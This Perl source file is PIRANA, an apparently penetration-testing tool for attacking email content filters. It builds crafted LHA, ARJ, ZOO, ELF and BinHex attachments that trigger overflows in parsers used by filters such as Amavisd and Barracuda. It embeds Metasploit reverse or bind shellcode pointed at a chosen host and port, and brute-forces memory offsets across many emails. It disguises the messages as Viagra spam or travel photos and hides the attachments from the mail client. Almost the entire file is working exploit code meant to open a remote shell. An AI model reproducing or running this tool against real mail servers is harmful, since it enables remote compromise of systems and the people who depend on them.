#!/usr/bin/perl -w

# Copyright (C) 2005 - 2006 Jean-Sbastien Guay-Leroux
#
# This file is part of PIRANA.
#
# PIRANA is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# PIRANA is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with PIRANA; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA


use MIME::Lite;
use Net::SMTP;
use Getopt::Std;

# perform flush after each write to STDOUT
$| = 1; 

# Global vars
my $from_address = 'john@asdf.com';
my $subject = "";
my $message_body;

my $exploit_path;
my $exploit_osvdb;
my $exploit_name;

my $shellcode_type;
my $cloaking;
my $attach_stealth_virus;
my $compression_binary = "/bin/tar";
my $files_path = "/tmp/pirana-files";
my $vanish_type;
my $packet_it;
my $malware_archive = "/tmp/pirana-archive";

#
# @malware_files is an array of array.
# Each array contained in @malware_files corresponds to a malware file entry
# Each array has those fields:
# 
# 1st field:	physical path of the file
# 2nd field:	name of the attached filename
# 3rd field:	force content-type
# 4th field:	attach this file to the final email (1), or not (0)
# 5th field:	Do we need to clean this file (1), or not (0)
#
my @malware_files;

# Automatically select content type
$MIME::Lite::AUTO_CONTENT_TYPE=1;

%exploits = (
        0	=> [ "5753", "LHA get_header File Name Overflow", "./exploits/exploit_LHA_get_header_filename" ],
        1	=> [ "5754", "LHA get_header Directory Name Overflow", "./exploits/exploit_LHA_get_header_directoryname" ],
        2	=> [ "6456", "file readelf.c tryelf() ELF Header Overflow", "./exploits/exploit_file_tryelf" ],
	3	=> [ "11695", "unarj Filename Handling Overflow", "./exploits/exploit_ARJ_long_filename"],
	4	=> [ "23460", "ZOO combine File and Dir name overflow", "./exploits/exploit_ZOO_combine"],
	5	=> [ "15867", "Convert UUlib uunconc integer overflow", "./exploits/exploit_convert_uulib.pl"]
);


########################### FUNCTIONS #################################

sub generate_shellcode ($) {

        my $create_shellcode_line;
	my $filtered_chars = $_[0];

	# linux_ia32_reverse
	if ($exploit_shellcode_type eq "0") {
		$create_shellcode_line = "perl framework-2.5/msfpayload linux_ia32_reverse LHOST=" . $ip .
		" LPORT=" . $port . " R | perl framework-2.5/msfencode -b " . "'$filtered_chars'" . 
		" -t raw > /tmp/raw 2>/dev/null";
	}
	# linux_ia32_reverse_udp
	elsif ($exploit_shellcode_type eq "1") {
		$create_shellcode_line = "perl framework-2.5/msfpayload linux_ia32_reverse_udp LHOST=" . $ip .
		" LPORT=" . $port . " R | perl framework-2.5/msfencode -b " . "'$filtered_chars'" .
		" -t raw > /tmp/raw 2>/dev/null";
	}
	# linux_ia32_bind
	elsif ($exploit_shellcode_type eq "2") {
		$create_shellcode_line = "perl framework-2.5/msfpayload linux_ia32_bind LPORT=" . $port .
		" R | perl framework-2.5/msfencode -b " . "'$filtered_chars'" .
		" -t raw > /tmp/raw 2>/dev/null";
	}
	else {
		print "Unknown shellcode\n";
		exit (-1);
	}

        system ($create_shellcode_line);

}

sub init_exploit_vars ($) {
	$exploit = $_[0];
	($exploit_osvdb, $exploit_name, $exploit_path) = @{$exploits{$exploit}};

	# Check if exploit exists
	if ( ! (-e $exploit_path) ) {
		die ("Exploit binary not found, consult README or make -f Makefile");
	}


}

sub list_exploits () {
	$counter = 0;

	print "Valid exploits numbers:\n";

	foreach $key (sort (keys %exploits)) {

	        @array = @{$exploits{$key}};
	        print "   $key\t\tOSVDB #$array[0]:\t$array[1]\n";

        	$counter++;
	}

	print "\n";
}

sub create_msg () {

	my $msg;

	$msg = MIME::Lite->new ( ) or die "Error, cannot create email: $!\n";

	return $msg;
}

#
# This function will create the part in the complete email that the user
# should see.
#
# Parameters:
#
# 1st:	Reference to MIME::Lite message structure
#
sub create_display_message () {

	my $msg;

	$msg = create_msg ();

	# No cloaking
	if ($cloaking eq "0") {

                $message_body = '<html></html>';
                $subject = "";

                $msg->build (Type => 'multipart/related');

                # attach body message
                $msg->attach(Type => 'text/html',
                                Data => $message_body,
                                Id => "Message_Body");

                # Loop through @malware_files to change attach filenames
                for ($i = 0, $j = 0; $i < @malware_files; $i++) {
                        if ($malware_files[$i][3] eq "1") {
                                $malware_files[$i][1] = "file_$j";
                                $j = $j + 1;
                        }
                }

	}
	# Viagra spam message
	elsif ($cloaking eq "1") {

		$message_body = '<html><img src="cid:picture_bottom.JPG"></html>' . "\n";
		$subject = "my dear friend";

		$msg->build (Type => 'multipart/related');

		# attach body message
		$msg->attach(Type => 'text/html', 
				Data => $message_body,
				Id => "Message_Body");

		# Attach the Viagra Advertisement
		attach_file (\$msg, "pictures/spam/viagra-ad.JPG", "picture_bottom.JPG", "image/jpeg", 0, "base64");

	        # Loop through @malware_files to change attach filenames
	        for ($i = 0, $j = 0; $i < @malware_files; $i++) {
			if ($malware_files[$i][3] eq "1") {
	        	        $malware_files[$i][1] = "picture_bottom_$j.JPG";
				$j = $j + 1;
			}
	        }
	}
	# Friend sending pictures
	elsif ($cloaking eq "2") {

                $message_body = '<html>Look at those pictures... Incredible!<br>' . 
		'<br><img src="cid:perou1.jpg">' .
		'<br><br><img src="cid:perou2.jpg">' .
		'<br><br><img src="cid:perou3.jpg">' .
		'<br><br><img src="cid:perou4.jpg">' .
		'<br><br><img src="cid:perou5.jpg">' .
		'</html>';

                $subject = "The pictures i promised you :)";

		$msg->build (Type => 'multipart/related');

		$msg->attach (Type => 'text/html',
				Data => $message_body,
				Id => "Message_Body");

		# Attach some beautiful pictures ;-)
		attach_file (\$msg, "pictures/trip/perou1.jpg", "perou1.jpg", "image/jpeg", 0, "base64");
		attach_file (\$msg, "pictures/trip/perou2.jpg", "perou2.jpg", "image/jpeg", 0, "base64");
		attach_file (\$msg, "pictures/trip/perou3.jpg", "perou3.jpg", "image/jpeg", 0, "base64");
		attach_file (\$msg, "pictures/trip/perou4.jpg", "perou4.jpg", "image/jpeg", 0, "base64");
		attach_file (\$msg, "pictures/trip/perou5.jpg", "perou5.jpg", "image/jpeg", 0, "base64");

	        # Loop through @malware_files to change attach filenames
	        for ($i = 0, $j = 0; $i < @malware_files; $i++) {
			if ($malware_files[$i][3] eq "1") {
	        	        $malware_files[$i][1] = "DSC000$j.JPG";
				$j = $j + 1;
			}
	        }

	}
	# Everything else: no cloaking
	else {

		# fatal erreur
		die ("Unknown cloaking style");
	}

	return $msg;
}

#
# This function will create the main email, which will include the email that
# we want to display to the user.  It will also attach specific malware
#
sub create_email_frame ($) {

	my $display_msg = ${$_[0]};
	my $msg;

	if ($vanish_type eq "0") {

                $display_msg->add ("From" => $from_address);
                $display_msg->add ("To" => $to_address);
                $display_msg->add ("Subject" => $subject);

		attach_malware (\$display_msg);

		return $display_msg;
	}
	elsif ($vanish_type eq "1") {

		$msg = create_msg ();

                $msg->build (Type => 'multipart/alternative');

		$msg->add ("From" => $from_address);
		$msg->add ("To" => $to_address);
		$msg->add ("Subject" => $subject);

		$msg->attach ($display_msg);

		attach_malware (\$msg);

		return $msg;

	}
	elsif ( $vanish_type eq "2" ) {

		my $new_string = "";
		my $string = "";

                $display_msg->add ("From" => $from_address);
                $display_msg->add ("To" => $to_address);
                $display_msg->add ("Subject" => $subject);

		# Modify body message to include <img src> tags
		for ($i = 0; $i < @malware_files; $i++) {
			if ($malware_files[$i][3] eq "1") {
				$new_string = $new_string . 
				'<img src="cid:' .
				$malware_files[$i][1] .
				'" height=0 width=0>' . "\n";
			}			
		}

		# Modify malware files content-type to make
		# sure they are image/jpeg so the MUA will be
		# able to "display" them ;-)
		for ($i = 0; $i < @malware_files; $i++) {
			if ($malware_files[$i][3] eq "1") {
				$malware_files[$i][2] = 
					"image/jpeg";
			}
		}

		# Get the Data out of the html display part
		# Modify it to include the previous builded string
		@parts = $display_msg->parts ();
		for ($i = 0; $i < @parts; $i ++) {
			$part = $parts[$i];
			if ($part->attr("content-id") eq "Message_Body") {
				$string = $part->data();
				$string =~ s/<\/html>/$new_string <\/html>/;
				$part->data ($string);
			}
		}

		attach_malware (\$display_msg);

		return $display_msg;

	}
	else {
		die ("Unknown vanishing type!");
	}

}

sub pack_malware () {

	# Make sure environnement is clean to operate
	if ( -e $malware_archive ) { system ("rm -f $malware_archive");	}
	if ( -e "$malware_archive.gz" ) { system ("rm -f $malware_archive.gz");	}

	# Loop through @malware_files to add them to the archive
	for (my $i = 0; $i < @malware_files; $i++) {

		if ($malware_files[$i][3] eq "1") {

			# Since we will attach the archive, flip the archive bit down
			# for the current file we are processing
			# $malware_files[$i][3] = 0;

			if ( -e $malware_archive ) {
				system ("tar rvf $malware_archive $malware_files[$i][0] > /dev/null 2>&1");
			}
			else {
				system ("tar cvf $malware_archive $malware_files[$i][0] > /dev/null 2>&1");
			}
		}
	}
	if (-e $malware_archive) { system ("gzip $malware_archive"); }
}

#
# Wrapper to attach a file to a message structure
#
# Parameters:
# 1st:	Reference to MIME::Lite message structure
# 2nd:	Physical path of the file
# 3rd:	Filename in the MIME entry
# 4th:	Content-type
# 5th:	Content-disposition
# 6th:	Encoding
#
sub attach_file ($$$$$$) {

	(my $msg_ref, my $path, my $filename, my $content_type, my $content_disposition, my $encoding) = @_;

	my $msg = ${$msg_ref};	

	if ($content_disposition eq "0") {
		$content_disposition = "inline";
	}
	elsif ($disposition eq "1") {
		$disposition = "attachement";
	}

	$msg->attach (
		Type => "$content_type",
		Encoding => $encoding,
		Disposition => $disposition,
	        Path => "$path",
		Id => "<$filename>",
        	Filename => $filename
	) or die "Error, cannot attach file: $!\n";
}

sub attach_malware ($) {

	my $msg_ref = $_[0];
	my $msg = ${$msg_ref};
	my $path;
	my $filename;
	my $content_type;
	my $attach_it;
	my $clean_it;

	# Check to see if we need to send the archive insead of the malwares
	if ( ($packet_it eq "1") && (-e "$malware_archive.gz") ) {
		# steal identity of the first file we meet ...
		for ($i = 0; $i < @malware_files; $i++) {
			if ($malware_files[$i][3] eq "1") {
				($path, $filename, $content_type, $attach_it, $clean_it) = @{$malware_files[$i]};
			}
		}
		attach_file (\$msg, "$malware_archive.gz", $filename, $content_type, 0, "base64");
		return;
	}

        # Loop through @malware_files
        for ($i = 0; $i < @malware_files; $i++) {
		($path, $filename, $content_type, $attach_it, $clean_it) = @{$malware_files[$i]};

		# The file was specified to be attached
		if ($attach_it eq "1") {
			attach_file (\$msg, $path, $filename, $content_type, 0, "base64");
		}
	}
}

sub attach_stealth_virus ($) {

	if ($attach_stealth_virus eq "1") {
		my $viruspath = $_[0];

		push (@malware_files, [ ($viruspath, "EICAR.COM", 
			"application/octet-stream", 1, 0) ] );

		print "$viruspath will be attached to the email\n";
	}

}

sub cleanup_filesystem { 

	my @current_file;

	# Loop through @malware_files and erase each file
	# that has the erase bit set.
	for ($i = 0; $i < @malware_files; $i++) {
		@current_file = @{$malware_files[$i]};

		if ($current_file[4] eq "1") {
			# Erase the malware file
			if ( ! (-e $current_file[0]) ) {
				die ("Cannot erase $current_file[1]: $!");
			} else {
				$cmd = "rm -f $current_file[0]";
				system ($cmd);
			}
		}
	}

	# Erase archive if it exists
        if ( ($attach_stealth_virus eq "1") && (-e "$malware_archive.gz") ) {
		system ("rm -f $malware_archive.gz");
	}

	# Erase temporary shellcode
	system ("rm -f /tmp/raw");
}

sub exploit_LHA_get_header_filename {

	my $msg;
	my $sendmsg;

	# Generate shellcode
        print "Generating shellcode in /tmp/raw ...";
	generate_shellcode ("\\x00");
	print " Done!!!\n";

	# Calculate how many attachements we need to produce for maximum efficacity,
	# and create those files with selected offsets
	$startoffset = 0xbfffa000; $endoffset = 0xbfffffff;
	printf ("Generating files ranging from offset 0x%x to 0x%x\n", $startoffset, $endoffset);
	for ($i = 0; $startoffset < $endoffset; $startoffset = $startoffset + 100, $i = $i + 1) {
	        $startoffset = sprintf ("0x%x", $startoffset);
		$cmd = "$exploit_path $startoffset $files_path/corrupted_file_$i";
		system ("$cmd");
		push (@malware_files, [ ( "$files_path/corrupted_file_$i",
						"$files_path/corrupted_file_$i",
						"application/octet-stream",
						"1",
						"1")] );
		print ".";
	        $startoffset = hex ($startoffset);
	}
	print "\n";

	# Adding a virus to the malware files ?
	if ($attach_stealth_virus eq "1") { attach_stealth_virus ("virus/eicar.com") };

	# Pack it ?
	if ($packet_it eq "1") { pack_malware (); }

	# Create the base message that the user should see

	# Create the main message
	$sendmsg = create_email_frame (\$msg);

	# Send the email
	$sendmsg->send_by_smtp($hostname, Hello=>"hostname.asdf.com");
	print "The email has been sent to " . $to_address . " through " . $hostname . "\n";

	print "You should now have a shell on " . $ip . ":" . $port . " !!!\n";
}

sub exploit_LHA_get_header_directoryname {

	my $msg;
	my $sendmsg;

	# Generate shellcode
        print "Generating shellcode in /tmp/raw ...";
	generate_shellcode ("\\x00");
	print " Done!!!\n";

	# Calculate how many attachements we need to produce for maximum efficacity,
	# and create those files with selected offsets
	$startoffset = 0xbfffa000; $endoffset = 0xbfffffff;
	printf ("Generating files ranging from offset 0x%x to 0x%x\n", $startoffset, $endoffset);
	for ($i = 0; $startoffset < $endoffset; $startoffset = $startoffset + 100, $i = $i + 1) {
	        $startoffset = sprintf ("0x%x", $startoffset);
		$cmd = "$exploit_path $startoffset $files_path/corrupted_file_$i";
		system ("$cmd");
		push (@malware_files, [ ( "$files_path/corrupted_file_$i",
						"$files_path/corrupted_file_$i",
						"application/octet-stream",
						"1",
						"1")] );
		print ".";
	        $startoffset = hex ($startoffset);
	}
	print "\n";

	# Adding a virus to the malware files ?
	if ($attach_stealth_virus eq "1") { attach_stealth_virus ("virus/eicar.com") };

	# Pack it ?
	if ($packet_it eq "1") { pack_malware (); }

	# Create the base message that the user should see
	$msg = create_display_message ();

	# Create the main message
	$sendmsg = create_email_frame (\$msg);

	# Send the email
	$sendmsg->send_by_smtp($hostname, Hello=>"hostname.asdf.com");
	print "The email has been sent to " . $to_address . " through " . $hostname . "\n";

	print "You should now have a shell on " . $ip . ":" . $port . " !!!\n";

}

#
# Note: Only attach one version of the file, with only one offset,
# because when the content filter segfaults on one of this file, 
# the daemon dies automatically so it can't retry on the other
# attached files...
#
sub exploit_file_readelf_tryelf () {

        my $msg;
        my $sendmsg;
	my $number_of_files = 0;
	my $flip_it = 0;
	my $i;

        # Generate shellcode
        print "Generating shellcode in /tmp/raw ...";
        generate_shellcode ("\\x00");
        print " Done!!!\n";

        # Calculate how many attachements we need to produce for maximum efficacity,
        # and create those files with selected offsets
        $startoffset = 0xbfffa000; $endoffset = 0xbfffffff;
        printf ("Generating files ranging from offset 0x%x to 0x%x\n", $startoffset, $endoffset);
        for ($i = 0; $startoffset < $endoffset; $startoffset = $startoffset + 1500, $i = $i + 1,
							$number_of_files = $number_of_files + 1 ) {

                $startoffset = sprintf ("0x%x", $startoffset);
                $cmd = "$exploit_path $startoffset $files_path/corrupted_file_$i";
                system ("$cmd");

		if ($i eq "0") {
	                push (@malware_files, [ ( "$files_path/corrupted_file_$i",
        	                                        "$files_path/corrupted_file_$i",
                	                                "application/octet-stream",
                        	                        "1",
                                	                "1")] );
		}
		else {
	                push (@malware_files, [ ( "$files_path/corrupted_file_$i",
        	                                        "$files_path/corrupted_file_$i",
                	                                "application/octet-stream",
                        	                        "0",
                                	                "1")] );
		}
                print "." ;
                $startoffset = hex ($startoffset);
	}
	print "\n";

        # Adding a virus to the malware files ?
        if ($attach_stealth_virus eq "1") { attach_stealth_virus ("virus/eicar.com") };

	print "Sending $number_of_files emails... \n";
	for ($i = 0; $i < $number_of_files; $i = $i + 1) {

	        # Pack it ?
	        if ($packet_it eq "1") { pack_malware (); }

	        # Create the base message that the user should see
        	$msg = create_display_message ();

	        # Create the main message
        	$sendmsg = create_email_frame (\$msg);

	        # Send the email
        	$sendmsg->send_by_smtp($hostname, Hello=>"hostname.asdf.com");
		print ".";

		for ($j = 0; $j < @malware_files - 1; $j = $j + 1) {

			if ( ( $malware_files[$j][0] =~ /corrupted/ ) && 
				( $malware_files[$j][3] eq "1" ) ) {

				$malware_files[$j][3] = 0;

				if ( $malware_files[$j+1][0] =~ /corrupted/ ) {
					$malware_files[$j+1][3] = 1;
				}

				last;
			}
		}

        }
	print "\n";

        print "$i emails have been sent to " . $to_address . " through " . $hostname . "\n";

        print "You should now have a shell on " . $ip . ":" . $port . " !!!\n";
}

sub exploit_unarj_filename_overflow () {

        my $msg;
        my $sendmsg;

        # Generate shellcode
        print "Generating shellcode in /tmp/raw ...";
	generate_shellcode ("\\x00\\x41");
        print " Done!!!\n";

        # Calculate how many attachements we need to produce for maximum efficacity,
        # and create those files with selected offsets
	$startoffset = 0xbfffa000; $endoffset = 0xbfffffff;
	printf ("Generating files ranging from offset 0x%x to 0x%x\n", $startoffset, $endoffset);
	for ($i = 0; $startoffset < $endoffset; $startoffset = $startoffset + 200, $i = $i + 1) {
	        $startoffset = sprintf ("0x%x", $startoffset);
                $cmd = "$exploit_path $startoffset $files_path/corrupted_file_$i";
		system ("$cmd");
                push (@malware_files, [ ( "$files_path/corrupted_file_$i",
                                                "$files_path/corrupted_file_$i",
                                                "application/octet-stream",
                                                "1",
                                                "1")] );
		print ".";
	        $startoffset = hex ($startoffset);
	}
	print "\n";

        # Adding a virus to the malware files ?
        if ($attach_stealth_virus eq "1") { attach_stealth_virus ("virus/eicar.com") };

        # Pack it ?
        if ($packet_it eq "1") { pack_malware (); }

        # Create the base message that the user should see
        $msg = create_display_message ();

        # Create the main message
        $sendmsg = create_email_frame (\$msg);

        # Send the email
        $sendmsg->send_by_smtp($hostname, Hello=>"hostname.asdf.com");
        print "The email has been sent to " . $to_address . " through " . $hostname . "\n";

        print "You should now have a shell on " . $ip . ":" . $port . " !!!\n";
}

sub exploit_ZOO_combine () {

        my $msg;
        my $sendmsg;

        # Generate shellcode
        print "Generating shellcode in /tmp/raw ...";
        generate_shellcode ("\\x00");
        print " Done!!!\n";

        # Calculate how many attachements we need to produce for maximum efficacity,
        # and create those files with selected offsets
	$startoffset = 0xbfffa000; $endoffset = 0xbfffffff;
	printf ("Generating files ranging from offset 0x%x to 0x%x\n", $startoffset, $endoffset);
	for ($i = 0; $startoffset < $endoffset; $startoffset = $startoffset + 60, $i = $i + 1) {
	        $startoffset = sprintf ("0x%x", $startoffset);
                $cmd = "$exploit_path $startoffset $files_path/corrupted_file_$i";
		system ("$cmd");
                push (@malware_files, [ ( "$files_path/corrupted_file_$i",
                                                "$files_path/corrupted_file_$i",
                                                "application/octet-stream",
                                                "1",
                                                "1")] );
		print ".";
	        $startoffset = hex ($startoffset);
	}
	print "\n";

        # Adding a virus to the malware files ?
        if ($attach_stealth_virus eq "1") { attach_stealth_virus ("virus/eicar.com") };

        # Pack it ?
        if ($packet_it eq "1") { pack_malware (); }

        # Create the base message that the user should see
        $msg = create_display_message ();

        # Create the main message
        $sendmsg = create_email_frame (\$msg);

        # Send the email
        $sendmsg->send_by_smtp($hostname, Hello=>"hostname.asdf.com");
        print "The email has been sent to " . $to_address . " through " . $hostname . "\n";

        print "You should now have a shell on " . $ip . ":" . $port . " !!!\n";
}

#
# Note: Only send one BinHex file at a time because when the shared library UUlib.so
# is called and the exploit does not work, Amavisd exits with a segfault error.
#
sub exploit_ConvertUUlib_BinHex () {

        my $msg;
        my $sendmsg;
        my $number_of_files = 0;
        my $flip_it = 0;
        my $i;
	my $bruteforce = 0;
	my $number_of_times_to_send = 3;
	my $startoffset = 0x40E90AE0; my $endoffset = 0x40E9FAE0;
	my $jump_by = 0x1000;

	#barracuda < 3.4
	my @builtinoffsets = (0x403B5AE0, 0x40E90AE0, 0x40E92AE0);

        # Generate shellcode
        print "Generating shellcode in /tmp/raw ...";
	generate_shellcode ("");
        print " Done!!!\n";

	if ($bruteforce eq "0") {
		for ($i = 0; $i < @builtinoffsets; $i++) {
			push (@offsets, $builtinoffsets[$i]);	
		}
	} else {
		for ($i = $startoffset; $i < $endoffset; $i = $i + $jump_by) {
			push (@offsets, $i);
		}
	}
	$number_of_files = @offsets;

	print "Generating $number_of_files file(s) ...\n";

	for ($i = 0; $i < @offsets; $i = $i + 1) {

		$currentoffset = $offsets[$i];
                $currentoffset = sprintf ("0x%x", $currentoffset);
	
		$cmd = "perl $exploit_path $currentoffset $files_path/corrupted_file_$i 2>/dev/null";
                system ("$cmd");
                print "Malicious file with offset $currentoffset generated.\n";

		if ($i eq "0") {
                        push (@malware_files, [ ( "$files_path/corrupted_file_$i",
                                                        "$files_path/corrupted_file_$i",
                                                        "application/octet-stream",
                                                        "1",
                                                        "1")] );
                }
                else {
                        push (@malware_files, [ ( "$files_path/corrupted_file_$i",
                                                        "$files_path/corrupted_file_$i",
                                                        "application/octet-stream",
                                                        "0",
                                                        "1")] );
                }
                $currentoffset = hex ($currentoffset);
        }

        # Adding a virus to the malware files ?
        if ($attach_stealth_virus eq "1") { attach_stealth_virus ("virus/eicar.com") };

        print "Sending " . $number_of_files * $number_of_times_to_send . " emails... \n";
        for ($i = 0; $i < $number_of_files; $i = $i + 1) {

                # Pack it ?
                if ($packet_it eq "1") { pack_malware (); }

                # Create the base message that the user should see
                $msg = create_display_message ();

                # Create the main message
                $sendmsg = create_email_frame (\$msg);

                # Send the email
		for ($j = 0; $j < $number_of_times_to_send; $j = $j + 1) {
                	$sendmsg->send_by_smtp($hostname, Hello=>"hostname.asdf.com");
			print ".";
		}
                print "\n";

                for ($j = 0; $j < @malware_files - 1; $j = $j + 1) {

                        if ( ( $malware_files[$j][0] =~ /corrupted/ ) &&
                                ( $malware_files[$j][3] eq "1" ) ) {

                                $malware_files[$j][3] = 0;

                                if ( $malware_files[$j+1][0] =~ /corrupted/ ) {
                                        $malware_files[$j+1][3] = 1;
                                }

                                last;
                        }
                }

        }

        print $number_of_files*$number_of_times_to_send . " email(s) have been sent to " . $to_address . " through " . $hostname . "\n";

        print "You should now have a shell on " . $ip . ":" . $port . " !!!\n";
}

sub usage () {

	print "Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS]\n\n";

	print "Mandatory arguments:\n";
	print "  -e+\t\tExploit number to use (See below)\n";
	print "  -h+\t\tSMTP server to test\n";
	print "  -a+\t\tDestination email address used in probing\n";
	print "\n";

	print "Optional arguments:\n";
	print "  -s+\t\tShellcode type to inject into exploits (See below)\n";
	print "  -c+\t\tCloaking style (See below)\n";
	print "  -d+\t\tTry to vanish attachements from MUA's view (See below)\n";
	print "  -v\t\tAttach EICAR virus to improve stealthness\n";
	print "  -z\t\tPack all the malware into a tarball to be less noisy\n";
        print "  -p+\t\tPort to use in reverse shell or bind shell\n";
        print "  -l+\t\tHost to connect back in reverse shell mode\n\n";

	list_exploits ();

	print "Valid shellcode types:\n";
	print "   0\t\tTCP reverse shell\n";
	print "   1\t\tUDP reverse shell\n";
        print "   2\t\tTCP bind shell\n\n";

	print "Valid cloaking styles (consult whitepaper for visual result):\n";
	print "   0\t\tNo cloaking at all (default)\n";
	print "   1\t\tViagra spam message\n";
	print "   2\t\t\"Look at the pictures I promised you!\"\n\n";

	print "Vanishing techniques for attachements:\n";
	print "   0\t\tNo vanishing at all (default)\n";
	print "   1\t\tMultipart/alternative trick\n";
	print "   2\t\t<img src=\"image.JPG\" width=0 height=0> trick\n";
}

######################### MAIN PRORAM ################################

getopts ('e:a:h:s:l:p:c:d:zv', \%opts);

if ( !(defined $opts{e}) || !(defined $opts{a}) || !(defined $opts{h}) ) {
        print "At least one mandatory option is missing...\n";
	usage ();
        exit (-1);
}

if ( ! (defined ($opts{s})) && ($opts{e} != 6)) {
	print "Shellcode type is missing...\n";
	usage ();
	exit (-1);
} 

if ( $opts{e} != 6 ) {
	# Shellcode is a TCP or UDP reverse shell
	if ($opts{s} =~ /^(0|1)$/) {
        	if ( (!defined $opts{l}) || (!defined $opts{p}) ){

	                print "Shellcode options are missing...\n";
        	        usage ();
                	exit (-1);

	        } else {
        	        $ip = $opts{l};
                	$port = $opts{p};
	        }
	} elsif ($opts{s} =~ /^(2)$/) {
	        if (!defined $opts{p}) {

        	        print "Shellcode options are missing...\n";
                	usage ();
	                exit (-1);

	        } else {
        	        $port = $opts{p};
                	$ip = $opts{h};
	        }
	}

}

if ( ! (defined ($opts{c})) ) {
	$cloaking = 0;
}
else { $cloaking = $opts{c}; }

if ( ! (defined ($opts{v})) ) {
	$attach_stealth_virus = 0;
} 
else { $attach_stealth_virus = 1; }

if ( ! (defined ($opts{d})) ) {
	$vanish_type = 0;
} 
else { $vanish_type = $opts{d}; }

if ( ! (defined ($opts{z})) ) {
	$packet_it = 0;
}
else { $packet_it = 1 }
 
$exploit = $opts{e};
$exploit_shellcode_type = $opts{s};
$to_address = $opts{a};
$hostname = $opts{h};

# Check if temporary directory exists 
if ( ! (-e $files_path) ) {
	# It doesnt, create it
	system ("mkdir $files_path");
}

if ($exploit eq "0") {
	init_exploit_vars ("0");
	exploit_LHA_get_header_filename ();
}
elsif ($exploit eq "1") {
	init_exploit_vars ("1");
	exploit_LHA_get_header_directoryname ();
}
elsif ($exploit eq "2") {
	init_exploit_vars ("2");
	exploit_file_readelf_tryelf ();
}
elsif ($exploit eq "3") {
	init_exploit_vars ("3");
	exploit_unarj_filename_overflow ();
}
elsif ($exploit eq "4") {
	init_exploit_vars ("4");
	exploit_ZOO_combine ();
}
elsif ($exploit eq "5") {
	init_exploit_vars ("5");
	exploit_ConvertUUlib_BinHex ();	
}
else {
	print "Unknown exploit number, here is the exploit list:\n\n";
	list_exploits ();
	exit (-1);		
}

cleanup_filesystem ();
